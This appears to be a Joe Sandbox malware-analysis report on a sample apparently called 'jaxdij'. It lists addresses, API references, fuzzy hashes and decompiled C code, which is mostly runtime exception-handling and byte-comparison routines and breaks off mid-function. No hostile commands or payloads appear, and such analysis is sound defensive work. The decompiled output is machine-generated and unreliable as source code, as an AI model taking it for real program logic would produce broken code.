                                                                                                                          0x00257ed9
                                                                                                                          0x00257edd
                                                                                                                          0x00000000
                                                                                                                          0x00257edd
                                                                                                                          0x00257ee6
                                                                                                                          0x00257afc
                                                                                                                          0x00257afc
                                                                                                                          0x00257b05
                                                                                                                          0x00257c02
                                                                                                                          0x00257c02
                                                                                                                          0x00257c05
                                                                                                                          0x00000000
                                                                                                                          0x00257b34
                                                                                                                          0x00257b34
                                                                                                                          0x00257b39
                                                                                                                          0x00000000
                                                                                                                          0x00257b3f
                                                                                                                          0x00257b3f
                                                                                                                          0x00257b47
                                                                                                                          0x00257dff
                                                                                                                          0x00257dff
                                                                                                                          0x00257b4d
                                                                                                                          0x00257b52
                                                                                                                          0x00257b55
                                                                                                                          0x00257b5a
                                                                                                                          0x00257b61
                                                                                                                          0x00257b66
                                                                                                                          0x00000000
                                                                                                                          0x00257b9e
                                                                                                                          0x00257ba6
                                                                                                                          0x00257c0a
                                                                                                                          0x00257c0a
                                                                                                                          0x00257c0d
                                                                                                                          0x00257c10
                                                                                                                          0x00257c12
                                                                                                                          0x00257c15
                                                                                                                          0x00257c18
                                                                                                                          0x00257c1e
                                                                                                                          0x00257dca
                                                                                                                          0x00257dca
                                                                                                                          0x00257dcd
                                                                                                                          0x00000000
                                                                                                                          0x00257dcf
                                                                                                                          0x00257dcf
                                                                                                                          0x00257dd2
                                                                                                                          0x00000000
                                                                                                                          0x00257dd8
                                                                                                                          0x00257de8
                                                                                                                          0x00257ded
                                                                                                                          0x00000000
                                                                                                                          0x00257ded
                                                                                                                          0x00257dd2
                                                                                                                          0x00257c24
                                                                                                                          0x00257c24
                                                                                                                          0x00257c28
                                                                                                                          0x00000000
                                                                                                                          0x00257c2e
                                                                                                                          0x00257c2e
                                                                                                                          0x00257c35
                                                                                                                          0x00257c4d
                                                                                                                          0x00257c4d
                                                                                                                          0x00257c50
                                                                                                                          0x00257c53
                                                                                                                          0x00257c69
                                                                                                                          0x00257c6e
                                                                                                                          0x00257c71
                                                                                                                          0x00257c74
                                                                                                                          0x00257c77
                                                                                                                          0x00257c7a
                                                                                                                          0x00257c7d
                                                                                                                          0x00257c80
                                                                                                                          0x00257c86
                                                                                                                          0x00257c86
                                                                                                                          0x00257c89
                                                                                                                          0x00257c8c
                                                                                                                          0x00257c8e
                                                                                                                          0x00257c9b
                                                                                                                          0x00257c9c
                                                                                                                          0x00257c9c
                                                                                                                          0x00257c9e
                                                                                                                          0x00257ca1
                                                                                                                          0x00257ca7
                                                                                                                          0x00257caa
                                                                                                                          0x00257cb0
                                                                                                                          0x00257cb2
                                                                                                                          0x00257cb5
                                                                                                                          0x00257cb8
                                                                                                                          0x00257cbe
                                                                                                                          0x00257cc1
                                                                                                                          0x00257cc6
                                                                                                                          0x00257cc6
                                                                                                                          0x00257cc9
                                                                                                                          0x00257ccc
                                                                                                                          0x00257ccf
                                                                                                                          0x00257cd2
                                                                                                                          0x00257cd5
                                                                                                                          0x00257cda
                                                                                                                          0x00257cdb
                                                                                                                          0x00257cdc
                                                                                                                          0x00257cdd
                                                                                                                          0x00257cde
                                                                                                                          0x00257ce1
                                                                                                                          0x00257ce4
                                                                                                                          0x00257ce6
                                                                                                                          0x00000000
                                                                                                                          0x00257ce8
                                                                                                                          0x00257ce8
                                                                                                                          0x00257cef
                                                                                                                          0x00257cf4
                                                                                                                          0x00257cf7
                                                                                                                          0x00257cf9
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00257cfb
                                                                                                                          0x00257cfe
                                                                                                                          0x00257cff
                                                                                                                          0x00257d02
                                                                                                                          0x00257d04
                                                                                                                          0x00000000
                                                                                                                          0x00257d06
                                                                                                                          0x00257d06
                                                                                                                          0x00257d09
                                                                                                                          0x00000000
                                                                                                                          0x00257d09
                                                                                                                          0x00000000
                                                                                                                          0x00257d04
                                                                                                                          0x00257d1d
                                                                                                                          0x00257d20
                                                                                                                          0x00257d23
                                                                                                                          0x00257d26
                                                                                                                          0x00257d29
                                                                                                                          0x00257d2d
                                                                                                                          0x00257d32
                                                                                                                          0x00257d33
                                                                                                                          0x00257d36
                                                                                                                          0x00257d39
                                                                                                                          0x00257d3c
                                                                                                                          0x00257d3f
                                                                                                                          0x00257d40
                                                                                                                          0x00257d45
                                                                                                                          0x00257d45
                                                                                                                          0x00257d48
                                                                                                                          0x00257d48
                                                                                                                          0x00000000
                                                                                                                          0x00257d0c
                                                                                                                          0x00257d0c
                                                                                                                          0x00257d0d
                                                                                                                          0x00257d10
                                                                                                                          0x00257d13
                                                                                                                          0x00257d16
                                                                                                                          0x00257d16
                                                                                                                          0x00000000
                                                                                                                          0x00257d1b
                                                                                                                          0x00257cb8
                                                                                                                          0x00257caa
                                                                                                                          0x00257d4b
                                                                                                                          0x00257d4e
                                                                                                                          0x00257d4f
                                                                                                                          0x00257d52
                                                                                                                          0x00257d55
                                                                                                                          0x00257d58
                                                                                                                          0x00257d5b
                                                                                                                          0x00257d5b
                                                                                                                          0x00257d64
                                                                                                                          0x00257d67
                                                                                                                          0x00257d67
                                                                                                                          0x00257c80
                                                                                                                          0x00257d6a
                                                                                                                          0x00257d6e
                                                                                                                          0x00257d70
                                                                                                                          0x00257d73
                                                                                                                          0x00257d79
                                                                                                                          0x00257d79
                                                                                                                          0x00257d81
                                                                                                                          0x00257d86
                                                                                                                          0x00257df0
                                                                                                                          0x00257df0
                                                                                                                          0x00257df5
                                                                                                                          0x00257df9
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00257d88
                                                                                                                          0x00257d8b
                                                                                                                          0x00257d8e
                                                                                                                          0x00257d92
                                                                                                                          0x00257da0
                                                                                                                          0x00257da2
                                                                                                                          0x00257db9
                                                                                                                          0x00257dbd
                                                                                                                          0x00257dc3
                                                                                                                          0x00257dc4
                                                                                                                          0x00257dc6
                                                                                                                          0x00000000
                                                                                                                          0x00257dc8
                                                                                                                          0x00000000
                                                                                                                          0x00257dc8
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00257d94
                                                                                                                          0x00257d94
                                                                                                                          0x00257d96
                                                                                                                          0x00000000
                                                                                                                          0x00257d98
                                                                                                                          0x00257d98
                                                                                                                          0x00257d9c
                                                                                                                          0x00000000
                                                                                                                          0x00257d9e
                                                                                                                          0x00257da4
                                                                                                                          0x00257da9
                                                                                                                          0x00257dac
                                                                                                                          0x00257db1
                                                                                                                          0x00257db4
                                                                                                                          0x00000000
                                                                                                                          0x00257db4
                                                                                                                          0x00257d9c
                                                                                                                          0x00257d96
                                                                                                                          0x00257d92
                                                                                                                          0x00257c37
                                                                                                                          0x00257c37
                                                                                                                          0x00257c3e
                                                                                                                          0x00000000
                                                                                                                          0x00257c40
                                                                                                                          0x00257c40
                                                                                                                          0x00257c47
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00257c47
                                                                                                                          0x00257c3e
                                                                                                                          0x00257c35
                                                                                                                          0x00257c28
                                                                                                                          0x00257ba8
                                                                                                                          0x00257bb0
                                                                                                                          0x00257bb3
                                                                                                                          0x00257bb8
                                                                                                                          0x00257bbc
                                                                                                                          0x00257bbf
                                                                                                                          0x00257bc5
                                                                                                                          0x00257bc8
                                                                                                                          0x00000000
                                                                                                                          0x00257bca
                                                                                                                          0x00257bca
                                                                                                                          0x00257bcd
                                                                                                                          0x00257bcf
                                                                                                                          0x00257e00
                                                                                                                          0x00257e00
                                                                                                                          0x00000000
                                                                                                                          0x00257bd5
                                                                                                                          0x00257bdd
                                                                                                                          0x00257be8
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00257bf1
                                                                                                                          0x00257bf4
                                                                                                                          0x00257bf5
                                                                                                                          0x00257bf8
                                                                                                                          0x00257bfa
                                                                                                                          0x00000000
                                                                                                                          0x00257c00
                                                                                                                          0x00000000
                                                                                                                          0x00257c00
                                                                                                                          0x00000000
                                                                                                                          0x00257bfa
                                                                                                                          0x00257bd5
                                                                                                                          0x00257e05
                                                                                                                          0x00257e05
                                                                                                                          0x00257e07
                                                                                                                          0x00257e08
                                                                                                                          0x00257e0f
                                                                                                                          0x00257e12
                                                                                                                          0x00257e20
                                                                                                                          0x00257e25
                                                                                                                          0x00257e2a
                                                                                                                          0x00257e2d
                                                                                                                          0x00257e32
                                                                                                                          0x00257e35
                                                                                                                          0x00257e38
                                                                                                                          0x00257e3a
                                                                                                                          0x00257e3c
                                                                                                                          0x00257e3c
                                                                                                                          0x00257e41
                                                                                                                          0x00257e4d
                                                                                                                          0x00257e53
                                                                                                                          0x00257e58
                                                                                                                          0x00257e5b
                                                                                                                          0x00257e5c
                                                                                                                          0x00000000
                                                                                                                          0x00257e5c
                                                                                                                          0x00257bc8
                                                                                                                          0x00257ba6
                                                                                                                          0x00257b66
                                                                                                                          0x00257b47
                                                                                                                          0x00257b39
                                                                                                                          0x00257b05

                                                                                                                          APIs
                                                                                                                          • type_info::operator==.LIBVCRUNTIME ref: 00257BE1
                                                                                                                          • ___TypeMatch.LIBVCRUNTIME ref: 00257CEF
                                                                                                                          • CatchIt.LIBVCRUNTIME ref: 00257D40
                                                                                                                          • _UnwindNestedFrames.LIBCMT ref: 00257E41
                                                                                                                          • CallUnexpected.LIBVCRUNTIME ref: 00257E5C
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.309791482.0000000000241000.00000020.00000001.01000000.00000004.sdmp, Offset: 00240000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.309786839.0000000000240000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309819433.000000000025C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309828993.0000000000264000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309836770.0000000000266000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309963168.0000000000269000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_240000_jaxdij.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                                          • String ID: Rx%$csm$csm$csm
                                                                                                                          • API String ID: 4119006552-2066523457
                                                                                                                          • Opcode ID: 3831f83fb4dd906a5c4b95fd054869aec6eee5ce467ff3644890442edf847f86
                                                                                                                          • Instruction ID: 432d989068c1629783cede6be2a920b4c0851a4c36981083d83268c52c41abe9
                                                                                                                          • Opcode Fuzzy Hash: 3831f83fb4dd906a5c4b95fd054869aec6eee5ce467ff3644890442edf847f86
                                                                                                                          • Instruction Fuzzy Hash: 52B18C3186420ADFCF25DFA4E8819AEB7B5BF14312F14409AEC016B212D371DA79CF99
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0024AA40 Relevance: 12.2, APIs: 8, Instructions: 181clipboardmemoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.309791482.0000000000241000.00000020.00000001.01000000.00000004.sdmp, Offset: 00240000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.309786839.0000000000240000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309819433.000000000025C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309828993.0000000000264000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309836770.0000000000266000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309963168.0000000000269000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_240000_jaxdij.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ClipboardGlobal$AllocEmptyLockOpen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3590494090-0
                                                                                                                          • Opcode ID: f15c825e35aeb9c38da8833ae6f5b227c830edac7c241035fdc5bd3086d57b30
                                                                                                                          • Instruction ID: bf82a197f144be3c9828e9c850175be4fb1e55c31f37f2b438264b5c2c333988
                                                                                                                          • Opcode Fuzzy Hash: f15c825e35aeb9c38da8833ae6f5b227c830edac7c241035fdc5bd3086d57b30
                                                                                                                          • Instruction Fuzzy Hash: 6B81F374A102199FCB08DFA8D588AADBBF0FF08315F148469E845EB351E774E990CB55
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0024A290 Relevance: 12.1, APIs: 8, Instructions: 137windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.309791482.0000000000241000.00000020.00000001.01000000.00000004.sdmp, Offset: 00240000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.309786839.0000000000240000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309819433.000000000025C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309828993.0000000000264000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309836770.0000000000266000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309963168.0000000000269000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_240000_jaxdij.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CaretFocusInvertRect$HideReleaseShow
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1353628544-0
                                                                                                                          • Opcode ID: 66fe80f7acc1ba43b497c9fed7023cecf52c2b881d424018d3fc1b46962fe2dd
                                                                                                                          • Instruction ID: 144c1896cdadc3bd994b72b0bc70e647fd129589ed7d1fbc124933bf42f0cdf1
                                                                                                                          • Opcode Fuzzy Hash: 66fe80f7acc1ba43b497c9fed7023cecf52c2b881d424018d3fc1b46962fe2dd
                                                                                                                          • Instruction Fuzzy Hash: 8561C474A04209CFCB08DF68D188AAEBBB1BF48311F158469E849DB351E774ED95CB92
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 002429C0 Relevance: 10.7, APIs: 7, Instructions: 190COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.309791482.0000000000241000.00000020.00000001.01000000.00000004.sdmp, Offset: 00240000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.309786839.0000000000240000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309819433.000000000025C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309828993.0000000000264000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309836770.0000000000266000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.309963168.0000000000269000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_240000_jaxdij.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateEvent
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2692171526-0
                                                                                                                          • Opcode ID: 0124ca50fff1e4e66275d7ec1fc25e88e67500169a4ae07d5563d009091b72b8
                                                                                                                          • Instruction ID: 8534fc58f58294105d18b4348bc9a31b314ac25794acb584d6ba956e9a7fddfe
                                                                                                                          • Opcode Fuzzy Hash: 0124ca50fff1e4e66275d7ec1fc25e88e67500169a4ae07d5563d009091b72b8
                                                                                                                          • Instruction Fuzzy Hash: 1891FBB0918205DFDB08DFA9D0887AEBBF0FB44314F50C92EE85597290D7B49598CF92
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0024DF10 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 69%
                                                                                                                          			E0024DF10(void* __ebx, void* __ecx, intOrPtr __edx, signed char* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed char* _v0;
				char _v5;
				signed int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				signed int _v32;
				void* __edi;
				void* __esi;
				signed int _t1005;
				signed int _t1012;
				intOrPtr _t1013;
				void* _t1014;
				signed char* _t1015;
				intOrPtr _t1017;
				signed int _t1020;
				signed int _t1021;
				signed int _t1022;
				signed int _t1025;
				signed int _t1028;
				signed int _t1032;
				signed char _t1049;
				signed char _t1052;
				signed char _t1053;
				signed char _t1054;
				signed char _t1055;
				signed char _t1056;
				signed int _t1245;
				intOrPtr* _t1249;
				intOrPtr _t1250;
				void* _t1252;
				signed int _t1256;
				char _t1258;
				signed int _t1262;
				signed int _t1263;
				signed int _t1270;
				signed char* _t1336;
				signed char* _t1337;
				signed char* _t1338;
				signed char* _t1339;
				signed char* _t1340;
				void* _t1341;
				intOrPtr _t1342;
				signed int _t1344;
				intOrPtr _t1347;
				signed char* _t1350;
				signed char* _t1351;
				signed char* _t1352;
				signed char* _t1353;
				signed char* _t1354;
				signed int _t1355;
				void* _t1358;
				void* _t1359;
				void* _t1365;

				_t1333 = __edx;
				_t1249 = _a4;
				_push(_t1341);
				_v5 = 0;
				_v16 = 1;
				 *_t1249 = E0025AEE1(__ecx,  *_t1249);
				_t1250 = _a8;
				_t6 = _t1250 + 0x10; // 0x11
				_t1347 = _t6;
				_push(_t1347);
				_v20 = _t1347;
				_v12 =  *(_t1250 + 8) ^  *0x264050;
				E0024DED0(_t1250, __edx, _t1341, _t1347,  *(_t1250 + 8) ^  *0x264050);
				E00252117(_a12);
				_t1005 = _a4;
				_t1359 = _t1358 + 0x10;
				_t1342 =  *((intOrPtr*)(_t1250 + 0xc));
				if(( *(_t1005 + 4) & 0x00000066) != 0) {
					__eflags = _t1342 - 0xfffffffe;
					if(_t1342 != 0xfffffffe) {
						_t1333 = 0xfffffffe;
						E00252100(_t1250, 0xfffffffe, _t1347, 0x264050);
						goto L13;
					}
					goto L14;
				} else {
					_v32 = _t1005;
					_v28 = _a12;
					 *((intOrPtr*)(_t1250 - 4)) =  &_v32;
					if(_t1342 == 0xfffffffe) {
						L14:
						return _v16;
					} else {
						do {
							_t1256 = _v12;
							_t1012 = _t1342 + (_t1342 + 2) * 2;
							_t1250 =  *((intOrPtr*)(_t1256 + _t1012 * 4));
							_t1013 = _t1256 + _t1012 * 4;
							_t1257 =  *((intOrPtr*)(_t1013 + 4));
							_v24 = _t1013;
							if( *((intOrPtr*)(_t1013 + 4)) == 0) {
								_t1258 = _v5;
								goto L7;
							} else {
								_t1333 = _t1347;
								_t1014 = E002520A0(_t1257, _t1347);
								_t1258 = 1;
								_v5 = 1;
								_t1365 = _t1014;
								if(_t1365 < 0) {
									_v16 = 0;
									L13:
									_push(_t1347);
									E0024DED0(_t1250, _t1333, _t1342, _t1347, _v12);
									goto L14;
								} else {
									if(_t1365 > 0) {
										_t1015 = _a4;
										__eflags =  *_t1015 - 0xe06d7363;
										if( *_t1015 == 0xe06d7363) {
											__eflags =  *0x25c628;
											if(__eflags != 0) {
												_t1245 = E00251EF0(__eflags, 0x25c628);
												_t1359 = _t1359 + 4;
												__eflags = _t1245;
												if(_t1245 != 0) {
													_t1355 =  *0x25c628; // 0x24dc95
													 *0x267000(_a4, 1);
													 *_t1355();
													_t1347 = _v20;
													_t1359 = _t1359 + 8;
												}
												_t1015 = _a4;
											}
										}
										_t1334 = _t1015;
										E002520E0(_t1015, _a8, _t1015);
										_t1017 = _a8;
										__eflags =  *((intOrPtr*)(_t1017 + 0xc)) - _t1342;
										if( *((intOrPtr*)(_t1017 + 0xc)) != _t1342) {
											_t1334 = _t1342;
											E00252100(_t1017, _t1342, _t1347, 0x264050);
											_t1017 = _a8;
										}
										_push(_t1347);
										 *((intOrPtr*)(_t1017 + 0xc)) = _t1250;
										E0024DED0(_t1250, _t1334, _t1342, _t1347, _v12);
										E002520C0();
										asm("int3");
										_push(_t1347);
										_push(_t1342);
										_t1344 = _v32;
										_t1020 = _t1344;
										__eflags = _t1020;
										if(_t1020 == 0) {
											_t1021 = 0;
											__eflags = 0;
										} else {
											_t1022 = _t1020 - 1;
											__eflags = _t1022;
											if(_t1022 == 0) {
												_t1262 =  *_v0 & 0x000000ff;
												_t1025 =  *_a4 & 0x000000ff;
												goto L511;
											} else {
												_t1028 = _t1022 - 1;
												__eflags = _t1028;
												if(_t1028 == 0) {
													_t1336 = _v0;
													_t1350 = _a4;
													_t1263 = ( *_t1336 & 0x000000ff) - ( *_t1350 & 0x000000ff);
													__eflags = _t1263;
													if(_t1263 != 0) {
														__eflags = _t1263;
														_t993 = _t1263 > 0;
														__eflags = _t993;
														_t1263 = (0 | _t993) * 2 - 1;
													}
													__eflags = _t1263;
													if(_t1263 != 0) {
														goto L513;
													} else {
														_t1262 = _t1336[1] & 0x000000ff;
														_t1025 = _t1350[1] & 0x000000ff;
														goto L511;
													}
													goto L528;
												} else {
													_t1032 = _t1028 - 1;
													__eflags = _t1032;
													if(_t1032 == 0) {
														_t1337 = _v0;
														_t1351 = _a4;
														_t1263 = ( *_t1337 & 0x000000ff) - ( *_t1351 & 0x000000ff);
														__eflags = _t1263;
														if(_t1263 != 0) {
															__eflags = _t1263;
															_t979 = _t1263 > 0;
															__eflags = _t979;
															_t1263 = (0 | _t979) * 2 - 1;
														}
														__eflags = _t1263;
														if(_t1263 != 0) {
															goto L513;
														} else {
															_t1263 = (_t1337[1] & 0x000000ff) - (_t1351[1] & 0x000000ff);
															__eflags = _t1263;
															if(_t1263 != 0) {
																__eflags = _t1263;
																_t985 = _t1263 > 0;
																__eflags = _t985;
																_t1263 = (0 | _t985) * 2 - 1;
															}
															__eflags = _t1263;
															if(_t1263 != 0) {
																goto L513;
															} else {
																_t1262 = _t1337[2] & 0x000000ff;
																_t1025 = _t1351[2] & 0x000000ff;
																goto L511;
															}
														}
														goto L528;
													} else {
														__eflags = _t1032 == 1;
														if(_t1032 == 1) {
															_t1338 = _v0;
															_t1352 = _a4;
															_t1263 = ( *_t1338 & 0x000000ff) - ( *_t1352 & 0x000000ff);
															__eflags = _t1263;
															if(_t1263 != 0) {
																__eflags = _t1263;
																_t955 = _t1263 > 0;
																__eflags = _t955;
																_t1263 = (0 | _t955) * 2 - 1;
															}
															__eflags = _t1263;
															if(_t1263 == 0) {
																_t1263 = (_t1338[1] & 0x000000ff) - (_t1352[1] & 0x000000ff);
																__eflags = _t1263;
																if(_t1263 != 0) {
																	__eflags = _t1263;
																	_t961 = _t1263 > 0;
																	__eflags = _t961;
																	_t1263 = (0 | _t961) * 2 - 1;
																}
																__eflags = _t1263;
																if(_t1263 == 0) {
																	_t1263 = (_t1338[2] & 0x000000ff) - (_t1352[2] & 0x000000ff);
																	__eflags = _t1263;
																	if(_t1263 != 0) {
																		__eflags = _t1263;
																		_t967 = _t1263 > 0;
																		__eflags = _t967;
																		_t1263 = (0 | _t967) * 2 - 1;
																	}
																	__eflags = _t1263;
																	if(_t1263 == 0) {
																		_t1262 = _t1338[3] & 0x000000ff;
																		_t1025 = _t1352[3] & 0x000000ff;
																		L511:
																		_t1263 = _t1262 - _t1025;
																		__eflags = _t1263;
																		if(_t1263 != 0) {
																			__eflags = _t1263;
																			_t973 = _t1263 > 0;
																			__eflags = _t973;
																			_t1263 = (0 | _t973) * 2 - 1;
																		}
																	}
																}
															}
															L513:
															_t1021 = _t1263;
														} else {
															_t1339 = _a4;
															_t1353 = _v0;
															_push(_t1250);
															_t1252 = 0x20;
															while(1) {
																__eflags = _t1344 - _t1252;
																if(_t1344 < _t1252) {
																	break;
																}
																_t1049 =  *_t1353;
																__eflags = _t1049 -  *_t1339;
																if(_t1049 ==  *_t1339) {
																	L42:
																	__eflags = _t1353[4] - _t1339[4];
																	if(_t1353[4] == _t1339[4]) {
																		L55:
																		__eflags = _t1353[8] - _t1339[8];
																		if(_t1353[8] == _t1339[8]) {
																			L68:
																			_t1052 = _t1353[0xc];
																			__eflags = _t1052 - _t1339[0xc];
																			if(_t1052 == _t1339[0xc]) {
																				L81:
																				_t1053 = _t1353[0x10];
																				__eflags = _t1053 - _t1339[0x10];
																				if(_t1053 == _t1339[0x10]) {
																					L94:
																					_t1054 = _t1353[0x14];
																					__eflags = _t1054 - _t1339[0x14];
																					if(_t1054 == _t1339[0x14]) {
																						L107:
																						_t1055 = _t1353[0x18];
																						__eflags = _t1055 - _t1339[0x18];
																						if(_t1055 == _t1339[0x18]) {
																							L120:
																							_t1056 = _t1353[0x1c];
																							__eflags = _t1056 - _t1339[0x1c];
																							if(_t1056 == _t1339[0x1c]) {
																								L133:
																								_t1353 =  &(_t1353[_t1252]);
																								_t1339 =  &(_t1339[_t1252]);
																								_t1344 = _t1344 - _t1252;
																								__eflags = _t1344;
																								continue;
																							} else {
																								_t1270 = (_t1056 & 0x000000ff) - (_t1339[0x1c] & 0x000000ff);
																								__eflags = _t1270;
																								if(_t1270 != 0) {
																									__eflags = _t1270;
																									_t228 = _t1270 > 0;
																									__eflags = _t228;
																									_t1270 = (0 | _t228) * 2 - 1;
																								}
																								__eflags = _t1270;
																								if(_t1270 == 0) {
																									_t1270 = (_t1353[0x1d] & 0x000000ff) - (_t1339[0x1d] & 0x000000ff);
																									__eflags = _t1270;
																									if(_t1270 != 0) {
																										__eflags = _t1270;
																										_t234 = _t1270 > 0;
																										__eflags = _t234;
																										_t1270 = (0 | _t234) * 2 - 1;
																									}
																									__eflags = _t1270;
																									if(_t1270 == 0) {
																										_t1270 = (_t1353[0x1e] & 0x000000ff) - (_t1339[0x1e] & 0x000000ff);
																										__eflags = _t1270;
																										if(_t1270 != 0) {
																											__eflags = _t1270;
																											_t240 = _t1270 > 0;
																											__eflags = _t240;
																											_t1270 = (0 | _t240) * 2 - 1;
																										}
																										__eflags = _t1270;
																										if(_t1270 == 0) {
																											_t1270 = (_t1353[0x1f] & 0x000000ff) - (_t1339[0x1f] & 0x000000ff);
																											__eflags = _t1270;
																											if(_t1270 != 0) {
																												__eflags = _t1270;
																												_t246 = _t1270 > 0;
																												__eflags = _t246;
																												_t1270 = (0 | _t246) * 2 - 1;
																											}
																											__eflags = _t1270;
																											if(_t1270 == 0) {
																												goto L133;
																											}
																										}
																									}
																								}
																							}
																						} else {
																							_t1270 = (_t1055 & 0x000000ff) - (_t1339[0x18] & 0x000000ff);
																							__eflags = _t1270;
																							if(_t1270 != 0) {
																								__eflags = _t1270;
																								_t203 = _t1270 > 0;
																								__eflags = _t203;
																								_t1270 = (0 | _t203) * 2 - 1;
																							}
																							__eflags = _t1270;
																							if(_t1270 == 0) {
																								_t1270 = (_t1353[0x19] & 0x000000ff) - (_t1339[0x19] & 0x000000ff);
																								__eflags = _t1270;
																								if(_t1270 != 0) {
																									__eflags = _t1270;
																									_t209 = _t1270 > 0;
																									__eflags = _t209;
																									_t1270 = (0 | _t209) * 2 - 1;
																								}
																								__eflags = _t1270;
																								if(_t1270 == 0) {
																									_t1270 = (_t1353[0x1a] & 0x000000ff) - (_t1339[0x1a] & 0x000000ff);
																									__eflags = _t1270;
																									if(_t1270 != 0) {
																										__eflags = _t1270;
																										_t215 = _t1270 > 0;
																										__eflags = _t215;
																										_t1270 = (0 | _t215) * 2 - 1;
																									}
																									__eflags = _t1270;
																									if(_t1270 == 0) {
																										_t1270 = (_t1353[0x1b] & 0x000000ff) - (_t1339[0x1b] & 0x000000ff);
																										__eflags = _t1270;
																										if(_t1270 != 0) {
																											__eflags = _t1270;
																											_t221 = _t1270 > 0;
																											__eflags = _t221;
																											_t1270 = (0 | _t221) * 2 - 1;
																										}
																										__eflags = _t1270;
																										if(_t1270 == 0) {
																											goto L120;
																										}
																									}
																								}
																							}
																						}
																					} else {
																						_t1270 = (_t1054 & 0x000000ff) - (_t1339[0x14] & 0x000000ff);
																						__eflags = _t1270;
																						if(_t1270 != 0) {
																							__eflags = _t1270;
																							_t178 = _t1270 > 0;
																							__eflags = _t178;
																							_t1270 = (0 | _t178) * 2 - 1;
																						}
																						__eflags = _t1270;
																						if(_t1270 == 0) {
																							_t1270 = (_t1353[0x15] & 0x000000ff) - (_t1339[0x15] & 0x000000ff);
																							__eflags = _t1270;
																							if(_t1270 != 0) {
																								__eflags = _t1270;
																								_t184 = _t1270 > 0;
																								__eflags = _t184;
																								_t1270 = (0 | _t184) * 2 - 1;
																							}
																							__eflags = _t1270;
																							if(_t1270 == 0) {
																								_t1270 = (_t1353[0x16] & 0x000000ff) - (_t1339[0x16] & 0x000000ff);
																								__eflags = _t1270;
																								if(_t1270 != 0) {
																									__eflags = _t1270;
																									_t190 = _t1270 > 0;
																									__eflags = _t190;
																									_t1270 = (0 | _t190) * 2 - 1;
																								}
																								__eflags = _t1270;
																								if(_t1270 == 0) {
																									_t1270 = (_t1353[0x17] & 0x000000ff) - (_t1339[0x17] & 0x000000ff);
																									__eflags = _t1270;
																									if(_t1270 != 0) {
																										__eflags = _t1270;
																										_t196 = _t1270 > 0;
																										__eflags = _t196;
